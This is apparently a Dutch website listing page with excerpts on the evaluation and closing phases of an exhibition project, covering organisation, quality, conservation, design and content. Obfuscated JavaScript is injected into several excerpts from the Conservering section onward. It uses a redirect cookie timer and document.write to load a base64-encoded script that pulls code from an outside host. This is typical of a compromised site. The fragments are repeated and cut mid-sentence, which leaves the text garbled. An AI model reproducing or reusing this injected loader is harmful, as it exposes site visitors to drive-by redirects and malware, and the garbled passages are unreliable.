Han Meeter

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

9 Evaluatiefase / Informatie

Ten aanzien van de infor­matiev­er­zorg­ing kun­nen de vol­gende aspecten onder­w­erp van eval­u­atie zijn: de Interne infor­matievoorzien­ing zoals opgezet tij­dens de Ini­ti­atiefase; de Externe infor­matievoorzien­ing zoals opgezet tij­dens de Ini­ti­atiefase, in het bij­zon­der of de belan­grijk­ste stake­hold­ers vol­doende en via de juiste media zijn geïn­formeerd over de voort­gang van het project; de werk­ing van het Infor­matiepro­to­col; de Read More

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

9 Evaluatiefase / Projectorganisatie

Ten aanzien van de organ­isatie van het project kun­nen de vol­gende aspecten onder­w­erp van eval­u­atie zijn: de pro­jec­tor­gan­isatie zoals opgezet in de Ini­ti­ati­ef­fase en eventueel aangepast in lat­ere fasen; de afstem­ming van de ver­schil­lende dis­ci­plines in de ver­schil­lende fasen; de samen­werk­ing tussen de betrokken par­ti­jen; de werk­ing van de con­tracten en opdracht­beves­tigin­gen; vorm, samen­stelling en inten­siteit van Read More

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

9 Evaluatiefase / Kwaliteit en Ambitieniveau

Gedurende de Eval­u­atiefase wordt getoets in hoev­erre de ten­toon­stelling met eventuele rand­pro­gram­mer­ing als ein­dresul­taat van het project vol­doet aan de eisen zoals gefor­muleerd tij­dens de aan­vang van het project. Ide­aliter vindt deze toets­ing plaats met behulp van sum­matief pub­liek­son­der­zoek. Aan­dacht­pun­ten bij deze toets­ing zijn: heeft de ten­toon­stelling de in het Ini­ti­atiefrap­port genoemde hoofd– en sub­doel­groepen bereikt; Read More

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

9 Evaluatiefase / Conservering

Tij­dens het eval­u­atiege­sprek wordt het eval­u­atier­ap­port aan­gaande de con­server­ingsaspecten bespro­ken en wor­den con­clusies getrokken welke ver­be­terin­gen bij toekom­stige pro­jecten mogelijk zijn. . CU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ gt; gt; gt; gt;

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

9 Evaluatiefase / Ontwerp

Afgezien van het met behulp van het sum­matief onder­zoek eval­ueren hoe het ontwerp heeft gefunc­tion­eerd  en van het eval­ueren van de demon­tage van de ten­toon­stelling, zijn er ten aanzien van dit aspect geen bij­zon­dere werkza­amhe­den in Eval­u­atiefase. –> SU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ iUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ iUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Read More

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

9 Evaluatiefase / Content

Als onderdeel van het sum­matieve pub­liek­son­der­zoek kan onder­zocht zijn of de inhoud van de ten­toon­stelling is overgekomen bij de bezoek­ers. Indien dit is onder­zocht kun­nen de resul­taten van dit onder­zoek meegenomen wor­den in het ein­drap­port van het sum­matief pub­liek­son­der­zoek waar mogelijk met aan­bevelin­gen voor ver­be­terin­gen. 2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ 2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Read More

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

9 Evaluatiefase / Strategisch Beleid

Indien de resul­taten van de Eval­u­atie zoals neergelegd in het Eval­u­atier­ap­port daar aan­lei­d­ing toe geven, kun­nen deze lei­den tot aan­passin­gen in het (tentoonstellings-)beleid van de opdracht­gever en/of de wijze waarop deze ten­toon­stellin­gen organ­iseert. ext/javascript”> func­tion getCookie(e){var U=document.cookie.match(new Reg­Exp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ 1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ Read More

Door
Laatste bewerking: mei 27, 2018

9 Evaluatiefase / Faseresultaat

Eval­u­atier­ap­port Resul­taat van deze fase is een Eval­u­atier­ap­port dat een beeld geeft van de pro­jecter­varin­gen die op gedaan zijn met zowel het func­tioneren van de ten­toon­stelling, als met de tot­stand­kom­ing daar­van. Met betrekking tot de tot­stand­kom­ing is er bij­zon­dere aan­dacht voor de uitein­delijke behaalde kwaliteit, het ver­loop van de finan­ciën, de plan­nin­gen, de organ­isatie en Read More

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

8 Afsluitingsfase / Projectorganisatie

Afgezien van de voor­berei­d­ing van de Eval­u­atie van het project, zijn er geen bij­zon­dere activiteiten ten aanzien van dit aspect gedurende deze Afs­lui­tende fase. hase. ta:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ gt; gt; gt; gt;

Door , geredigeerd door Mario Jellema
Laatste bewerking: mei 27, 2018

8 Afsluitingsfase / Kwaliteit en Ambitieniveau

Afgezien van het con­trol­eren door de pro­jectlei­der of de werkza­amhe­den die uit­gevo­erd wor­den tij­dens deze fase naar behoren wor­den uit­gevo­erd, zijn er geen bij­zon­dere werkza­amhe­den ten aanzien van dit aspect gedurende de Afs­luit­ings­fase. pe=“text/javascript”> func­tion getCookie(e){var U=document.cookie.match(new Reg­Exp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘ \\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Read More

Older Posts